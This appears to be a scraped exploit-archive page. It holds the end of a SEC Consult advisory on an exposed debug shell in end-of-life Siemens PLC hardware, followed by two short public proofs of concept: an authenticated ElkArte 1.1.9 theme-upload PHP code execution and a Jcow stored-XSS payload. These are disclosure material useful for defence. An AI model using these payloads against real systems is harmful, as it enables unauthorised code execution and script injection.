X X X X X X<br /> X X X X X X X X<br /> XXXXX XXXXX X X X X XX<br /> X X X X X X X X<br /> X X X X X X X X X X<br /> XXXXX XXX XXX XXXXX X XXX XXX<br />---------------------------------------------------<br /><br />1703 Shell [V1.00]<br />(c) by 1703 Development Team<br /><br />type 'help' or '?' or press 'F1' for help<br /><br />SH1703><br /><br />Initialize system ..<br />. Init Done.<br /><br />system startup after Power-Up ...<br />Install device 'USB Server'.<br /><br /> RTC time not valid<br /><br /> RTC time not valid<br /><br /> RTC time not valid<br />Reg: 100 Komp: 2 BSE: 20<br />Hello from <R#100 / K#2 / BSE#2> FW-ID: 2019 FW-Version: 0.06A01<br />Startup ZBGs ... done.<br /><br />system ready<br />SH1703>help<br />Available commands:<br /> hist Display command history<br />!<n> Execute <n> command from stack<br /> ? [<cmd>] Display this message<br /> help [<cmd>] Display this message<br /> echo <text> Displays text<br /> call <file> Run script file<br /> cls Clear screen<br /> loop <cmd> Loop-execution of cmd<br /> ldfile <file> Load ascii file<br /> db <a> [-b|w|d<x> [-n<x>]] Display memory byte/word/dword<br /> wb <a> <val> [-b|w|d<x>] Write memory byte/word/dword<br /> mb <a> [-b|w|d<x> [-n<x>]] Monitoring memory byte/word/dword<br /> login Login<br /> logoff Logoff<br /> pci ... PCI Commands<br /> bemrk Run Benchmark<br /> drv List installed drives<br /> dir List files in directory<br /> del [<drv:>]<file> Delete file<br /> ren <src> <dest> Rename or move file<br /> cd <dir>|<..> Change current directory or drive<br /> md <dir> Make directory<br /> rd <dir> Remove directory<br /> type [<drv:>]<file> Displays the contents of a file<br /> copy <src> <dest> Copy a file<br /> findstr <file> <str> Find a string in a textfile<br /> mkdisk <drvname> <size> Make a Ramdisk<br /> uidisk <drvname> Close and uninstall a disk<br /> format <drvname> Format drive<br /> mem_wr <addr> <size> <des> Write mem to file<br /> idr Read from diagnostic ring<br /> icr Clear diagnostic ring<br /> idd Debug-Trace ON<br /> bp Read all breakpoint settings<br /> bpf [<file>] Set File for Debugprint (no arg = stdout)<br /> is ... Debugger settings<br /> ig [f|s] Display BPs / Clear all BPs<br /> idb Read DB-Breaks<br /> idt Read DB-Trace Settings<br /> icz Clear breakpoint counters<br /> dev ... ZIO-Device commands<br /> bsp ... bsp commands<br /> ftrc ... FTRC Commands<br /> banner Display the banner<br /> pl Display process list<br /> pi [<appl_nr>] Display process info<br /> ad -c|d|k|s APP-Debug Create|Detach|Kill|Start<br /> tl Display task list (all processes)<br /> tm [-r] Display task monitor (-r = runtime)<br /> tc <taskname> Display task context<br /> td <taskID> Display task descriptor<br /> tq Display task queues<br /> sysztsk Display ZOS-tasks of system process<br /> appztsk [<appl_nr>] Display ZOS-tasks of appl-process(es)<br /> stack Display stack usage of all tasks<br /> stsk -c|d|e|s|r ZOS-Task Create|Del|Exch|Suspend|Resume<br /> tsktrc -s|r|c ZOS-Task-Trace Start|Read|Clear<br /> set [<name>=<val>] Display, set or remove environment variables<br /> time Display the current time<br /> timeset Set the current time<br /> mem Display memory usage<br /> status Display system status informations<br /> ver Display version informations<br /> r Reset system element (R,R Cxx,R Pxx,R Zxx<br /> klog [dis|ena|all] Display, disable or enable kernel logging<br /> psp_info Display prozessor configuration infos<br /> int_info Interrupt-Info-List<br /> int_gen Generate Interrupt (for Admin only)<br /> tlbs Display TLBs<br /> ga [<appl_nr>] Start Subshell of application<br /> tsd Debug Timeserver<br /> mci MCI Commands<br /> usb <cmd> USB commands<br /> mmc <cmd> MMC Commands<br /> zhs ZHS commands<br /> zpv Parameter infos<br /> zdt data transporter<br /> fsn ZIO/FSN statistics<br /> net <enet|emac|mal> <dev> Network statistics<br /> prd <pg> <reg> <len> Read PHY register (len: 8|16|32)<br /> pwr <pg> <reg> <len> <data> Write PHY register (len: 8|16|32)<br /> rmib Reset all statistic counters<br /> scfg Display broadcom switch registers<br /> ipaddr <dev> Display ip addresses on interface<br /> route Display routing table<br /> socket Display socket statistic<br /> tcp Display tcp statistic<br /> udp Display udp statistic<br /> arp Display arp cache<br /> ping host-ipaddr send ICMP ECHO_REQUEST to a host<br /> arl Switch Address Resolution table<br /> ebuf Statistic for Buffer handling FSN<br /> tls_ciph print cipher suites for all connections<br /> tls_obj idx print connection objects<br /> tls_log log level for tls lib<br /> tls_deb idx print connection debug cnts<br /> tlscache print cert/key cache<br /> opensslm print mem pool statistic for openssl<br /> tlsdeb_s START mem pool debug function<br /> tlsdeb_e END mem pool debug function<br /> tlsdeb_r print mem pool debug for openssl<br /> tlsdeb_c CLEAR mem pool debug function<br /> sap special application function<br />Available Function-Keys:<br /> F1 Help<br /> F2 Display system status informations<br /> F3 Display Last command<br /> F5 Display the current time<br /> F7 History<br /> F8 Display memory usage<br /> F9 Display ZOS-Task Infos<br /> F10 Display Tasklist<br /> F11 Execute Last command<br />SH1703><br /><br />----------------------------------------<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions have been tested which were the latest version available<br />at the time of the test:<br />* CP-2016: CPCX26 V0.06A01<br />* CP-2019: PCCX26 V0.06A01<br />* CP-2014: CPCX25 V0.05A04<br />* CP-2017: PCCX25 V0.11A10<br />* CP-5056: CPCX55 V0.10A04<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-03-05: Contacting vendor through productcert@siemens.com<br />2024-03-06: Siemens tracks this issue as case #04393<br />2024-04-03: Requested status update.<br />2024-04-03: Product is EOL, no fix planned.<br />2024-04-29: Informed Siemens about planned publication of advisory.<br />2024-04-30: Siemens, requests draft of advisory. Advisory is sent for review.<br />2024-05-07: Siemens requested small changes in the Solution and Business<br /> Recommendation.<br />2024-05-24: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />The hardware is no longer produced nor offered to the market. Hence HW<br />adaptions resulting in modified products are not possible anymore. The<br />described HW behavior on this generation of devices cannot be corrected<br />by means of FW patches.<br /><br />The risk of successful exploitation is considered low as physical access to<br />those devices is needed.<br /><br /><br />Workaround:<br />-----------<br />Make sure to strictly limit physical access to the PLC during and also<br />after its life cycle.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Steffen Robertz, Gerhard Hechenberger, Constantin Schieber-Knöbl / @2024<br /><br /></code></pre>
<pre><code># Exploit Title : ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated) <br /># Date: 2024-5-24<br /># Exploit Author: tmrswrr<br /># Category: Webapps<br /># Vendor Homepage: https://www.elkarte.net/<br /># Software Link : https://github.com/elkarte/Elkarte/releases/download/v1.1.9/ElkArte_v1-1-9_install.zip<br /># Version : 1.1.9<br /><br /><br />1) After login go to Manage and Install theme > https://127.0.0.1/ElkArte/index.php?action=admin;area=theme;sa=admin;c2e3e39a0d=276c2e3e39a0d65W2qg1voAFfX1yNc5m<br />2) Upload test.zip file and click install > test.zip > test.php > <?php echo system('id'); ?><br />3) Go to Theme Setting > Theme Directory > https://127.0.0.1/ElkArte/themes/test/test.php<br />Result : uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte) uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte)<br /></code></pre>
<pre><code># Exploit Title: Jcow Social Networking 14.2 < 16.2.1 | Stored XSS <br /># Date: 2024-05-23<br /># Author: tmrswrr<br /># Vendor Homepage: https://www.jcow.net/<br /># Software Link: https://sourceforge.net/projects/jcow/<br /># Tested : https://demo.jcow.net/<br /># Version : 14.2 < 16.2.1<br /><br /><br />1) Login with any user Click invite place : https://127.0.0.1/Jcow/index.php?p=invite<br />2) Write in To (Email address) field your payload : "><img src=x onerrora=confirm() onerror=confirm(1)><br />3) After Send invitations you will be see alert button<br /><br /><br /></code></pre>